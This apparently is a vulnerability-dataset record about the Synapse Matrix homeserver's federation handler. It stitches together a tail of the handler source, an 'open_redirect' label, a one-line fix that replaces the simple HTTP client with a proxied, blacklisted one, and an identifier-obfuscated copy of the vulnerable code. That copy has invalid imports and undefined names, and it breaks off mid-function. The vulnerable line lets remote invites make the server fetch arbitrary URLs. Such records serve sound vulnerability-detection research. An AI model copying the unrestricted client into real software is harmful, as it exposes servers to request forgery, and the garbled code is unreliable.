# but then shouldn't we also do so if we've failed to fetch any of the
# auth events?
return context
# now we state-resolve between our own idea of the auth events, and the remote's
# idea of them.
local_state = auth_events.values()
remote_auth_events = dict(auth_events)
remote_auth_events.update({(d.type, d.state_key): d for d in different_events})
remote_state = remote_auth_events.values()
room_version = await self.store.get_room_version_id(event.room_id)
new_state = await self.state_handler.resolve_events(
room_version, (local_state, remote_state), event
)
logger.info(
"After state res: updating auth_events with new state %s",
{
(d.type, d.state_key): d.event_id
for d in new_state.values()
if auth_events.get((d.type, d.state_key)) != d
},
)
auth_events.update(new_state)
context = await self._update_context_for_auth_events(
event, context, auth_events
)
return context
async def _update_context_for_auth_events(
self, event: EventBase, context: EventContext, auth_events: StateMap[EventBase]
) -> EventContext:
"""Update the state_ids in an event context after auth event resolution,
storing the changes as a new state group.
Args:
event: The event we're handling the context for
context: initial event context
auth_events: Events to update in the event context.
Returns:
new event context
"""
# exclude the state key of the new event from the current_state in the context.
if event.is_state():
event_key = (event.type, event.state_key) # type: Optional[Tuple[str, str]]
else:
event_key = None
state_updates = {
k: a.event_id for k, a in auth_events.items() if k != event_key
}
current_state_ids = await context.get_current_state_ids()
current_state_ids = dict(current_state_ids) # type: ignore
current_state_ids.update(state_updates)
prev_state_ids = await context.get_prev_state_ids()
prev_state_ids = dict(prev_state_ids)
prev_state_ids.update({k: a.event_id for k, a in auth_events.items()})
# create a new state group as a delta from the existing one.
prev_group = context.state_group
state_group = await self.state_store.store_state_group(
event.event_id,
event.room_id,
prev_group=prev_group,
delta_ids=state_updates,
current_state_ids=current_state_ids,
)
return EventContext.with_state(
state_group=state_group,
state_group_before_event=context.state_group_before_event,
current_state_ids=current_state_ids,
prev_state_ids=prev_state_ids,
prev_group=prev_group,
delta_ids=state_updates,
)
async def construct_auth_difference(
self, local_auth: Iterable[EventBase], remote_auth: Iterable[EventBase]
) -> Dict:
""" Given a local and remote auth chain, find the differences. This
assumes that we have already processed all events in remote_auth
Params:
local_auth (list)
remote_auth (list)
Returns:
dict
"""
logger.debug("construct_auth_difference Start!")
# TODO: Make sure we are OK with local_auth or remote_auth having more
# auth events in them than strictly necessary.
def sort_fun(ev):
return ev.depth, ev.event_id
logger.debug("construct_auth_difference after sort_fun!")
# We find the differences by starting at the "bottom" of each list
# and iterating up on both lists. The lists are ordered by depth and
# then event_id, we iterate up both lists until we find the event ids
# don't match. Then we look at depth/event_id to see which side is
# missing that event, and iterate only up that list. Repeat.
remote_list = list(remote_auth)
remote_list.sort(key=sort_fun)
local_list = list(local_auth)
local_list.sort(key=sort_fun)
local_iter = iter(local_list)
remote_iter = iter(remote_list)
logger.debug("construct_auth_difference before get_next!")
def get_next(it, opt=None):
try:
return next(it)
except Exception:
return opt
current_local = get_next(local_iter)
current_remote = get_next(remote_iter)
logger.debug("construct_auth_difference before while")
missing_remotes = []
missing_locals = []
while current_local or current_remote:
if current_remote is None:
missing_locals.append(current_local)
current_local = get_next(local_iter)
continue
if current_local is None:
missing_remotes.append(current_remote)
current_remote = get_next(remote_iter)
continue
if current_local.event_id == current_remote.event_id:
current_local = get_next(local_iter)
current_remote = get_next(remote_iter)
continue
if current_local.depth < current_remote.depth:
missing_locals.append(current_local)
current_local = get_next(local_iter)
continue
if current_local.depth > current_remote.depth:
missing_remotes.append(current_remote)
current_remote = get_next(remote_iter)
continue
# They have the same depth, so we fall back to the event_id order
if current_local.event_id < current_remote.event_id:
missing_locals.append(current_local)
current_local = get_next(local_iter)
if current_local.event_id > current_remote.event_id:
missing_remotes.append(current_remote)
current_remote = get_next(remote_iter)
continue
logger.debug("construct_auth_difference after while")
# missing locals should be sent to the server
# We should find why we are missing remotes, as they will have been
# rejected.
# Remove events from missing_remotes if they are referencing a missing
# remote. We only care about the "root" rejected ones.
missing_remote_ids = [e.event_id for e in missing_remotes]
base_remote_rejected = list(missing_remotes)
for e in missing_remotes:
for e_id in e.auth_event_ids():
if e_id in missing_remote_ids:
try:
base_remote_rejected.remove(e)
except ValueError:
pass
reason_map = {}
for e in base_remote_rejected:
reason = await self.store.get_rejection_reason(e.event_id)
if reason is None:
# TODO: e is not in the current state, so we should
# construct some proof of that.
continue
reason_map[e.event_id] = reason
logger.debug("construct_auth_difference returning")
return {
"auth_chain": local_auth,
"rejects": {
e.event_id: {"reason": reason_map[e.event_id], "proof": None}
for e in base_remote_rejected
},
"missing": [e.event_id for e in missing_locals],
}
@log_function
async def exchange_third_party_invite(
self, sender_user_id, target_user_id, room_id, signed
):
third_party_invite = {"signed": signed}
event_dict = {
"type": EventTypes.Member,
"content": {
"membership": Membership.INVITE,
"third_party_invite": third_party_invite,
},
"room_id": room_id,
"sender": sender_user_id,
"state_key": target_user_id,
}
if await self.auth.check_host_in_room(room_id, self.hs.hostname):
room_version = await self.store.get_room_version_id(room_id)
builder = self.event_builder_factory.new(room_version, event_dict)
EventValidator().validate_builder(builder)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
event, context = await self.add_display_name_to_third_party_invite(
room_version, event_dict, event, context
)
EventValidator().validate_new(event, self.config)
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = self.hs.hostname
try:
await self.auth.check_from_context(room_version, event, context)
except AuthError as e:
logger.warning("Denying new third party invite %r because %s", event, e)
raise e
await self._check_signature(event, context)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
else:
destinations = {x.split(":", 1)[-1] for x in (sender_user_id, room_id)}
await self.federation_client.forward_third_party_invite(
destinations, room_id, event_dict
)
async def on_exchange_third_party_invite_request(
self, event_dict: JsonDict
) -> None:
"""Handle an exchange_third_party_invite request from a remote server
The remote server will call this when it wants to turn a 3pid invite
into a normal m.room.member invite.
Args:
event_dict: Dictionary containing the event body.
"""
assert_params_in_dict(event_dict, ["room_id"])
room_version = await self.store.get_room_version_id(event_dict["room_id"])
# NB: event_dict has a particular specced format we might need to fudge
# if we change event formats too much.
builder = self.event_builder_factory.new(room_version, event_dict)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
event, context = await self.add_display_name_to_third_party_invite(
room_version, event_dict, event, context
)
try:
await self.auth.check_from_context(room_version, event, context)
except AuthError as e:
logger.warning("Denying third party invite %r because %s", event, e)
raise e
await self._check_signature(event, context)
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = get_domain_from_id(event.sender)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
async def add_display_name_to_third_party_invite(
self, room_version, event_dict, event, context
):
key = (
EventTypes.ThirdPartyInvite,
event.content["third_party_invite"]["signed"]["token"],
)
original_invite = None
prev_state_ids = await context.get_prev_state_ids()
original_invite_id = prev_state_ids.get(key)
if original_invite_id:
original_invite = await self.store.get_event(
original_invite_id, allow_none=True
)
if original_invite:
# If the m.room.third_party_invite event's content is empty, it means the
# invite has been revoked. In this case, we don't have to raise an error here
# because the auth check will fail on the invite (because it's not able to
# fetch public keys from the m.room.third_party_invite event's content, which
# is empty).
display_name = original_invite.content.get("display_name")
event_dict["content"]["third_party_invite"]["display_name"] = display_name
else:
logger.info(
"Could not find invite event for third_party_invite: %r", event_dict
)
# We don't discard here as this is not the appropriate place to do
# auth checks. If we need the invite and don't have it then the
# auth check code will explode appropriately.
builder = self.event_builder_factory.new(room_version, event_dict)
EventValidator().validate_builder(builder)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
EventValidator().validate_new(event, self.config)
return (event, context)
async def _check_signature(self, event, context):
"""
Checks that the signature in the event is consistent with its invite.
Args:
event (Event): The m.room.member event to check
context (EventContext):
Raises:
AuthError: if signature didn't match any keys, or key has been
revoked,
SynapseError: if a transient error meant a key couldn't be checked
for revocation.
"""
signed = event.content["third_party_invite"]["signed"]
token = signed["token"]
prev_state_ids = await context.get_prev_state_ids()
invite_event_id = prev_state_ids.get((EventTypes.ThirdPartyInvite, token))
invite_event = None
if invite_event_id:
invite_event = await self.store.get_event(invite_event_id, allow_none=True)
if not invite_event:
raise AuthError(403, "Could not find invite")
logger.debug("Checking auth on event %r", event.content)
last_exception = None # type: Optional[Exception]
# for each public key in the 3pid invite event
for public_key_object in self.hs.get_auth().get_public_keys(invite_event):
try:
# for each sig on the third_party_invite block of the actual invite
for server, signature_block in signed["signatures"].items():
for key_name, encoded_signature in signature_block.items():
if not key_name.startswith("ed25519:"):
continue
logger.debug(
"Attempting to verify sig with key %s from %r "
"against pubkey %r",
key_name,
server,
public_key_object,
)
try:
public_key = public_key_object["public_key"]
verify_key = decode_verify_key_bytes(
key_name, decode_base64(public_key)
)
verify_signed_json(signed, server, verify_key)
logger.debug(
"Successfully verified sig with key %s from %r "
"against pubkey %r",
key_name,
server,
public_key_object,
)
except Exception:
logger.info(
"Failed to verify sig with key %s from %r "
"against pubkey %r",
key_name,
server,
public_key_object,
)
raise
try:
if "key_validity_url" in public_key_object:
await self._check_key_revocation(
public_key, public_key_object["key_validity_url"]
)
except Exception:
logger.info(
"Failed to query key_validity_url %s",
public_key_object["key_validity_url"],
)
raise
return
except Exception as e:
last_exception = e
if last_exception is None:
# we can only get here if get_public_keys() returned an empty list
# TODO: make this better
raise RuntimeError("no public key in invite event")
raise last_exception
async def _check_key_revocation(self, public_key, url):
"""
Checks whether public_key has been revoked.
Args:
public_key (str): base-64 encoded public key.
url (str): Key revocation URL.
Raises:
AuthError: if they key has been revoked.
SynapseError: if a transient error meant a key couldn't be checked
for revocation.
"""
try:
response = await self.http_client.get_json(url, {"public_key": public_key})
except Exception:
raise SynapseError(502, "Third party certificate could not be checked")
if "valid" not in response or not response["valid"]:
raise AuthError(403, "Third party certificate was invalid")
async def persist_events_and_notify(
self,
room_id: str,
event_and_contexts: Sequence[Tuple[EventBase, EventContext]],
backfilled: bool = False,
) -> int:
"""Persists events and tells the notifier/pushers about them, if
necessary.
Args:
room_id: The room ID of events being persisted.
event_and_contexts: Sequence of events with their associated
context that should be persisted. All events must belong to
the same room.
backfilled: Whether these events are a result of
backfilling or not
"""
instance = self.config.worker.events_shard_config.get_instance(room_id)
if instance != self._instance_name:
result = await self._send_events(
instance_name=instance,
store=self.store,
room_id=room_id,
event_and_contexts=event_and_contexts,
backfilled=backfilled,
)
return result["max_stream_id"]
else:
assert self.storage.persistence
# Note that this returns the events that were persisted, which may not be
# the same as were passed in if some were deduplicated due to transaction IDs.
events, max_stream_token = await self.storage.persistence.persist_events(
event_and_contexts, backfilled=backfilled
)
if self._ephemeral_messages_enabled:
for event in events:
# If there's an expiry timestamp on the event, schedule its expiry.
self._message_handler.maybe_schedule_expiry(event)
if not backfilled: # Never notify for backfilled events
for event in events:
await self._notify_persisted_event(event, max_stream_token)
return max_stream_token.stream
async def _notify_persisted_event(
self, event: EventBase, max_stream_token: RoomStreamToken
) -> None:
"""Checks to see if notifier/pushers should be notified about the
event or not.
Args:
event:
max_stream_id: The max_stream_id returned by persist_events
"""
extra_users = []
if event.type == EventTypes.Member:
target_user_id = event.state_key
# We notify for memberships if its an invite for one of our
# users
if event.internal_metadata.is_outlier():
if event.membership != Membership.INVITE:
if not self.is_mine_id(target_user_id):
return
target_user = UserID.from_string(target_user_id)
extra_users.append(target_user)
elif event.internal_metadata.is_outlier():
return
# the event has been persisted so it should have a stream ordering.
assert event.internal_metadata.stream_ordering
event_pos = PersistedEventPosition(
self._instance_name, event.internal_metadata.stream_ordering
)
self.notifier.on_new_room_event(
event, event_pos, max_stream_token, extra_users=extra_users
)
async def _clean_room_for_join(self, room_id: str) -> None:
"""Called to clean up any data in DB for a given room, ready for the
server to join the room.
Args:
room_id
"""
if self.config.worker_app:
await self._clean_room_for_join_client(room_id)
else:
await self.store.clean_room_for_join(room_id)
async def get_room_complexity(
self, remote_room_hosts: List[str], room_id: str
) -> Optional[dict]:
"""
Fetch the complexity of a remote room over federation.
Args:
remote_room_hosts (list[str]): The remote servers to ask.
room_id (str): The room ID to ask about.
Returns:
Dict contains the complexity
metric versions, while None means we could not fetch the complexity.
"""
for host in remote_room_hosts:
res = await self.federation_client.get_room_complexity(host, room_id)
# We got a result, return it.
if res:
return res
# We fell off the bottom, couldn't get the complexity from anyone. Oh
# well.
return None
| open_redirect | {
"code": [
" self.http_client = hs.get_simple_http_client()"
],
"line_no": [
143
]
} | {
"code": [
" self.http_client = hs.get_proxied_blacklisted_http_client()"
],
"line_no": [
143
]
} |
import .itertools
import logging
from collections.abc import Container
from http import HTTPStatus
from typing import TYPE_CHECKING, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import attr
from signedjson.key import decode_verify_key_bytes
from signedjson.sign import verify_signed_json
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse import .event_auth
from synapse.api.constants import (
VAR_188,
Membership,
RejectedReason,
RoomEncryptionAlgorithms,
)
from synapse.api.errors import (
AuthError,
CodeMessageException,
Codes,
FederationDeniedError,
FederationError,
HttpResponseException,
NotFoundError,
RequestSendFailed,
SynapseError,
)
from synapse.api.room_versions import KNOWN_ROOM_VERSIONS, RoomVersion, RoomVersions
from synapse.crypto.event_signing import .compute_event_signature
from synapse.event_auth import .auth_types_for_event
from synapse.events import EventBase
from synapse.events.snapshot import EventContext
from synapse.events.validator import EventValidator
from synapse.handlers._base import BaseHandler
from synapse.http.servlet import assert_params_in_dict
from synapse.logging.context import (
make_deferred_yieldable,
nested_logging_context,
preserve_fn,
run_in_background,
)
from synapse.logging.utils import log_function
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.http.devices import ReplicationUserDevicesResyncRestServlet
from synapse.replication.http.federation import (
ReplicationCleanRoomRestServlet,
ReplicationFederationSendEventsRestServlet,
ReplicationStoreRoomOnOutlierMembershipRestServlet,
)
from synapse.state import StateResolutionStore
from synapse.storage.databases.main.events_worker import EventRedactBehaviour
from synapse.types import (
JsonDict,
MutableStateMap,
PersistedEventPosition,
RoomStreamToken,
StateMap,
UserID,
get_domain_from_id,
)
from synapse.util.async_helpers import Linearizer, concurrently_execute
from synapse.util.retryutils import NotRetryingDestination
from synapse.util.stringutils import shortstr
from synapse.visibility import filter_events_for_server
if TYPE_CHECKING:
from synapse.server import HomeServer
VAR_0 = logging.getLogger(__name__)
@attr.s(slots=True)
class CLASS_0:
VAR_1 = attr.ib(type=EventBase)
VAR_2 = attr.ib(type=Optional[Sequence[EventBase]], default=None)
VAR_3 = attr.ib(type=Optional[MutableStateMap[EventBase]], default=None)
class CLASS_1(BaseHandler):
def __init__(self, VAR_4: "HomeServer"):
super().__init__(VAR_4)
self.hs = VAR_4
self.store = VAR_4.get_datastore()
self.storage = VAR_4.get_storage()
self.state_store = self.storage.state
self.federation_client = VAR_4.get_federation_client()
self.state_handler = VAR_4.get_state_handler()
self._state_resolution_handler = VAR_4.get_state_resolution_handler()
self.server_name = VAR_4.hostname
self.keyring = VAR_4.get_keyring()
self.action_generator = VAR_4.get_action_generator()
self.is_mine_id = VAR_4.is_mine_id
self.spam_checker = VAR_4.get_spam_checker()
self.event_creation_handler = VAR_4.get_event_creation_handler()
self._message_handler = VAR_4.get_message_handler()
self._server_notices_mxid = VAR_4.config.server_notices_mxid
self.config = VAR_4.config
self.http_client = VAR_4.get_simple_http_client()
self._instance_name = VAR_4.get_instance_name()
self._replication = VAR_4.get_replication_data_handler()
self._send_events = ReplicationFederationSendEventsRestServlet.make_client(VAR_4)
self._clean_room_for_join_client = ReplicationCleanRoomRestServlet.make_client(
VAR_4
)
if VAR_4.config.worker_app:
self._user_device_resync = ReplicationUserDevicesResyncRestServlet.make_client(
VAR_4
)
self._maybe_store_room_on_outlier_membership = ReplicationStoreRoomOnOutlierMembershipRestServlet.make_client(
VAR_4
)
else:
self._device_list_updater = VAR_4.get_device_handler().device_list_updater
self._maybe_store_room_on_outlier_membership = (
self.store.maybe_store_room_on_outlier_membership
)
self.room_queues = {} # type: Dict[str, List[Tuple[EventBase, str]]]
self._room_pdu_linearizer = Linearizer("fed_room_pdu")
self.third_party_event_rules = VAR_4.get_third_party_event_rules()
self._ephemeral_messages_enabled = VAR_4.config.enable_ephemeral_messages
async def FUNC_0(self, VAR_5, VAR_6, VAR_7=False) -> None:
VAR_11 = VAR_6.room_id
VAR_12 = VAR_6.event_id
VAR_0.info("handling received PDU: %s", VAR_6)
VAR_51 = await self.store.get_event(
VAR_12, allow_none=True, allow_rejected=True
)
VAR_52 = VAR_51 and (
not VAR_51.internal_metadata.is_outlier()
or VAR_6.internal_metadata.is_outlier()
)
if VAR_52:
VAR_0.debug("[%s %s]: Already VAR_54 pdu", VAR_11, VAR_12)
return
try:
self._sanity_check_event(VAR_6)
except SynapseError as err:
VAR_0.warning(
"[%s %s] Received VAR_1 failed sanity checks", VAR_11, VAR_12
)
raise FederationError("ERROR", err.code, err.msg, affected=VAR_6.event_id)
if VAR_11 in self.room_queues:
VAR_0.info(
"[%s %s] Queuing PDU from %s for now: join in progress",
VAR_11,
VAR_12,
VAR_5,
)
self.room_queues[VAR_11].append((VAR_6, VAR_5))
return
VAR_53 = await self.auth.check_host_in_room(VAR_11, self.server_name)
if not VAR_53:
VAR_0.info(
"[%s %s] Ignoring PDU from %s as we're not in the room",
VAR_11,
VAR_12,
VAR_5,
)
return None
VAR_2 = None
if not VAR_6.internal_metadata.is_outlier():
VAR_9 = await self.get_min_depth_for_context(VAR_6.room_id)
VAR_0.debug("[%s %s] VAR_9: %d", VAR_11, VAR_12, VAR_9)
VAR_8 = set(VAR_6.prev_event_ids())
VAR_54 = await self.store.have_events_in_timeline(VAR_8)
if VAR_9 is not None and VAR_6.depth < VAR_9:
VAR_6.internal_metadata.outlier = True
elif VAR_9 is not None and VAR_6.depth > VAR_9:
VAR_191 = VAR_8 - VAR_54
if VAR_7 and VAR_191:
VAR_0.info(
"[%s %s] Acquiring room lock to fetch %d VAR_37 prev_events: %s",
VAR_11,
VAR_12,
len(VAR_191),
shortstr(VAR_191),
)
with (await self._room_pdu_linearizer.queue(VAR_6.room_id)):
VAR_0.info(
"[%s %s] Acquired room lock to fetch %d VAR_37 prev_events",
VAR_11,
VAR_12,
len(VAR_191),
)
try:
await self._get_missing_events_for_pdu(
VAR_5, VAR_6, VAR_8, VAR_9
)
except Exception as VAR_170:
raise Exception(
"Error fetching VAR_37 prev_events for %s: %s"
% (VAR_12, VAR_170)
) from VAR_170
VAR_54 = await self.store.have_events_in_timeline(VAR_8)
if not VAR_8 - VAR_54:
VAR_0.info(
"[%s %s] Found all VAR_37 prev_events",
VAR_11,
VAR_12,
)
if VAR_8 - VAR_54:
if VAR_7:
VAR_0.warning(
"[%s %s] Rejecting: failed to fetch %d prev VAR_20: %s",
VAR_11,
VAR_12,
len(VAR_8 - VAR_54),
shortstr(VAR_8 - VAR_54),
)
raise FederationError(
"ERROR",
403,
(
"Your server isn't divulging details about prev_events "
"referenced in this VAR_1."
),
affected=VAR_6.event_id,
)
VAR_0.info(
"Event %s is VAR_37 prev_events: calculating VAR_2 for a "
"backwards extremity",
VAR_12,
)
VAR_60 = {VAR_12: VAR_6}
try:
VAR_192 = await self.state_store.get_state_groups_ids(VAR_11, VAR_54)
VAR_193 = list(VAR_192.values()) # type: List[StateMap[str]]
del VAR_192
for p in VAR_8 - VAR_54:
VAR_0.info(
"Requesting VAR_2 at VAR_37 VAR_200 %s", VAR_12,
)
with nested_logging_context(p):
(VAR_62, VAR_166,) = await self._get_state_for_room(
VAR_5, VAR_11, p, VAR_13=True
)
VAR_202 = {
(VAR_204.type, VAR_204.state_key): VAR_204.event_id for VAR_204 in VAR_62
}
VAR_193.append(VAR_202)
for VAR_204 in VAR_62:
VAR_60[VAR_204.event_id] = VAR_204
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_87 = await self._state_resolution_handler.resolve_events_with_store(
VAR_11,
VAR_28,
VAR_193,
VAR_60,
state_res_store=StateResolutionStore(self.store),
)
VAR_194 = await self.store.get_events(
list(VAR_87.values()),
get_prev_content=False,
redact_behaviour=EventRedactBehaviour.AS_IS,
)
VAR_60.update(VAR_194)
VAR_2 = [VAR_60[VAR_170] for VAR_170 in VAR_87.values()]
except Exception:
VAR_0.warning(
"[%s %s] Error attempting to VAR_85 VAR_2 at VAR_37 "
"prev_events",
VAR_11,
VAR_12,
exc_info=True,
)
raise FederationError(
"ERROR",
403,
"We can't get valid VAR_2 history.",
affected=VAR_12,
)
await self._process_received_pdu(VAR_5, VAR_6, VAR_2=state)
async def FUNC_1(self, VAR_5, VAR_6, VAR_8, VAR_9):
VAR_11 = VAR_6.room_id
VAR_12 = VAR_6.event_id
VAR_54 = await self.store.have_events_in_timeline(VAR_8)
if not VAR_8 - VAR_54:
return
VAR_55 = await self.store.get_latest_event_ids_in_room(VAR_11)
VAR_56 = set(VAR_55)
VAR_56 |= VAR_54
VAR_0.info(
"[%s %s]: Requesting VAR_37 VAR_20 between %s and %s",
VAR_11,
VAR_12,
shortstr(VAR_56),
VAR_12,
)
try:
VAR_65 = await self.federation_client.get_missing_events(
VAR_5,
VAR_11,
earliest_events_ids=list(VAR_56),
VAR_39=[VAR_6],
VAR_17=10,
VAR_9=min_depth,
timeout=60000,
)
except (RequestSendFailed, HttpResponseException, NotRetryingDestination) as VAR_170:
VAR_0.warning(
"[%s %s]: Failed to get prev_events: %s", VAR_11, VAR_12, VAR_170
)
return
VAR_0.info(
"[%s %s]: Got %d prev_events: %s",
VAR_11,
VAR_12,
len(VAR_65),
shortstr(VAR_65),
)
VAR_65.sort(VAR_144=lambda VAR_204: x.depth)
for VAR_21 in VAR_65:
VAR_0.info(
"[%s %s] Handling received VAR_200 %s",
VAR_11,
VAR_12,
VAR_21.event_id,
)
with nested_logging_context(VAR_21.event_id):
try:
await self.on_receive_pdu(VAR_5, VAR_21, VAR_7=False)
except FederationError as VAR_170:
if VAR_170.code == 403:
VAR_0.warning(
"[%s %s] Received VAR_200 %s failed history check.",
VAR_11,
VAR_12,
VAR_21.event_id,
)
else:
raise
async def FUNC_2(
self,
VAR_10: str,
VAR_11: str,
VAR_12: str,
VAR_13: bool = False,
) -> Tuple[List[EventBase], List[EventBase]]:
(
VAR_57,
VAR_58,
) = await self.federation_client.get_room_state_ids(
VAR_10, VAR_11, VAR_12=event_id
)
VAR_59 = set(VAR_57 + VAR_58)
if VAR_13:
VAR_59.add(VAR_12)
VAR_60 = await self._get_events_from_store_or_dest(
VAR_10, VAR_11, VAR_59
)
VAR_61 = VAR_59 - VAR_60.keys()
if VAR_61:
VAR_0.warning(
"Failed to fetch VAR_37 VAR_2/VAR_89 VAR_20 for %s %s",
VAR_12,
VAR_61,
)
VAR_62 = [
VAR_60[VAR_160] for VAR_160 in VAR_57 if VAR_160 in VAR_60
]
if VAR_13:
VAR_154 = VAR_60.get(VAR_12)
if not VAR_154:
raise Exception("Unable to get VAR_37 VAR_200 %s" % (VAR_12,))
if VAR_154.is_state() and VAR_154.rejected_reason is None:
VAR_62.append(VAR_154)
VAR_63 = [VAR_60[VAR_160] for VAR_160 in VAR_58 if VAR_160 in VAR_60]
VAR_63.sort(VAR_144=lambda VAR_170: VAR_170.depth)
return VAR_62, VAR_63
async def FUNC_3(
self, VAR_10: str, VAR_11: str, VAR_14: Iterable[str]
) -> Dict[str, EventBase]:
VAR_64 = await self.store.get_events(VAR_14, allow_rejected=True)
VAR_65 = set(VAR_14) - VAR_64.keys()
if VAR_65:
VAR_0.debug(
"Fetching unknown VAR_2/VAR_89 VAR_20 %s for room %s",
VAR_65,
VAR_11,
)
await self._get_events_and_persist(
VAR_10=destination, VAR_11=room_id, VAR_20=VAR_65
)
VAR_64.update(
(await self.store.get_events(VAR_65, allow_rejected=True))
)
VAR_66 = [
(VAR_12, VAR_1.room_id)
for VAR_12, VAR_1 in VAR_64.items()
if VAR_1.room_id != VAR_11
]
for bad_event_id, bad_room_id in VAR_66:
VAR_0.warning(
"Remote server %s claims VAR_1 %s in room %s is an VAR_89/VAR_2 "
"event in room %s",
VAR_10,
bad_event_id,
bad_room_id,
VAR_11,
)
del VAR_64[bad_event_id]
return VAR_64
async def FUNC_4(
self, VAR_5: str, VAR_1: EventBase, VAR_2: Optional[Iterable[EventBase]],
):
VAR_11 = VAR_1.room_id
VAR_12 = VAR_1.event_id
VAR_0.debug("[%s %s] Processing VAR_1: %s", VAR_11, VAR_12, VAR_1)
try:
await self._handle_new_event(VAR_5, VAR_1, VAR_2=state)
except AuthError as VAR_170:
raise FederationError("ERROR", VAR_170.code, VAR_170.msg, affected=VAR_1.event_id)
if VAR_1.type == VAR_188.Encrypted:
VAR_155 = VAR_1.content.get("device_id")
VAR_156 = VAR_1.content.get("sender_key")
VAR_157 = await self.store.get_cached_devices_for_user(VAR_1.sender)
VAR_158 = False # Whether we should VAR_158 VAR_159 lists.
VAR_159 = None
if VAR_155 is not None:
VAR_159 = VAR_157.get(VAR_155)
if VAR_159 is None:
VAR_0.info(
"Received VAR_1 from remote VAR_159 not in our cache: %s %s",
VAR_1.sender,
VAR_155,
)
VAR_158 = True
if VAR_156 is not None:
VAR_186 = [] # type: Container[str]
if VAR_159:
VAR_195 = VAR_159.get("keys", {}).get("keys", {})
if (
VAR_1.content.get("algorithm")
== RoomEncryptionAlgorithms.MEGOLM_V1_AES_SHA2
):
VAR_199 = "curve25519:%s" % (VAR_155,)
VAR_186 = [VAR_195.get(VAR_199)]
else:
VAR_186 = VAR_195.values()
elif VAR_155:
pass
else:
VAR_186 = [
VAR_144
for VAR_159 in VAR_157.values()
for VAR_144 in VAR_159.get("keys", {}).get("keys", {}).values()
]
if VAR_156 not in VAR_186:
VAR_0.info(
"Received VAR_1 from remote VAR_159 with unexpected VAR_15 VAR_144: %s %s: %s",
VAR_1.sender,
VAR_155 or "<no VAR_155>",
VAR_156,
)
VAR_158 = True
if VAR_158:
run_as_background_process(
"resync_device_due_to_pdu", self._resync_device, VAR_1.sender
)
async def FUNC_5(self, VAR_15: str) -> None:
try:
await self.store.mark_remote_user_device_cache_as_stale(VAR_15)
if self.config.worker_app:
await self._user_device_resync(VAR_27=VAR_15)
else:
await self._device_list_updater.user_device_resync(VAR_15)
except Exception:
VAR_0.exception("Failed to VAR_158 VAR_159 for %s", VAR_15)
@log_function
async def FUNC_6(self, VAR_16, VAR_11, VAR_17, VAR_18):
if VAR_16 == self.server_name:
raise SynapseError(400, "Can't FUNC_6 from self.")
VAR_20 = await self.federation_client.backfill(
VAR_16, VAR_11, VAR_17=limit, VAR_18=extremities
)
if not VAR_20:
return []
VAR_67 = await self.store.have_events_in_timeline(
{VAR_170.event_id for VAR_170 in VAR_20}
)
VAR_20 = [VAR_170 for VAR_170 in VAR_20 if VAR_170.event_id not in VAR_67]
if not VAR_20:
return []
VAR_60 = {VAR_170.event_id: VAR_170 for VAR_170 in VAR_20}
VAR_14 = {VAR_170.event_id for VAR_170 in VAR_20}
VAR_68 = [VAR_21.event_id for VAR_21 in VAR_20 if set(VAR_21.prev_event_ids()) - VAR_14]
VAR_0.info("backfill: Got %d VAR_20 with %d edges", len(VAR_20), len(VAR_68))
VAR_3 = {}
VAR_69 = {}
VAR_70 = {}
for VAR_160 in VAR_68:
VAR_2, VAR_89 = await self._get_state_for_room(
VAR_10=VAR_16,
VAR_11=room_id,
VAR_12=VAR_160,
VAR_13=False,
)
VAR_3.update({a.event_id: a for a in VAR_89})
VAR_3.update({s.event_id: s for s in VAR_2})
VAR_69.update({s.event_id: s for s in VAR_2})
VAR_70[VAR_160] = VAR_2
VAR_71 = {
a_id
for VAR_1 in VAR_20
+ list(VAR_69.values())
+ list(VAR_3.values())
for a_id in VAR_1.auth_event_ids()
}
VAR_3.update(
{VAR_160: VAR_60[VAR_160] for VAR_160 in VAR_71 if VAR_160 in VAR_60}
)
VAR_72 = []
for VAR_160 in VAR_70:
VAR_21 = VAR_60[VAR_160]
assert not VAR_21.internal_metadata.is_outlier()
VAR_72.append(
CLASS_0(
VAR_1=VAR_21,
VAR_2=VAR_70[VAR_160],
VAR_3={
(
auth_events[a_id].type,
VAR_3[a_id].state_key,
): VAR_3[a_id]
for a_id in VAR_21.auth_event_ids()
if a_id in VAR_3
},
)
)
if VAR_72:
await self._handle_new_events(VAR_16, VAR_11, VAR_72, VAR_33=True)
VAR_20.sort(VAR_144=lambda VAR_170: VAR_170.depth)
for VAR_1 in VAR_20:
if VAR_1 in VAR_70:
continue
assert not VAR_1.internal_metadata.is_outlier()
await self._handle_new_event(VAR_16, VAR_1, VAR_33=True)
return VAR_20
async def FUNC_7(
self, VAR_11: str, VAR_19: int, VAR_17: int
) -> bool:
VAR_18 = await self.store.get_oldest_events_with_depth_in_room(VAR_11)
if not VAR_18:
VAR_0.debug("Not backfilling as no extremeties found.")
return False
VAR_73 = await self.store.get_successor_events(list(VAR_18))
VAR_74 = await self.store.get_events(
VAR_73,
redact_behaviour=EventRedactBehaviour.AS_IS,
get_prev_content=False,
)
VAR_75 = await filter_events_for_server(
self.storage,
self.server_name,
list(VAR_74.values()),
redact=False,
check_history_visibility_only=True,
)
if not VAR_75:
return False
VAR_76 = sorted(VAR_18.items(), VAR_144=lambda VAR_170: -int(VAR_170[1]))
VAR_77 = VAR_76[0][1]
if VAR_19 - 2 * VAR_17 > VAR_77:
VAR_0.debug(
"Not backfilling as we don't need to. %d < %d - 2 * %d",
VAR_77,
VAR_19,
VAR_17,
)
return False
VAR_0.debug(
"room_id: %s, FUNC_6: VAR_19: %s, VAR_77: %s, extrems: %s",
VAR_11,
VAR_19,
VAR_77,
VAR_76,
)
VAR_78 = [
t for t in VAR_76 if int(t[1]) <= VAR_19
]
if VAR_78:
VAR_76 = VAR_78
VAR_18 = dict(VAR_76[:5])
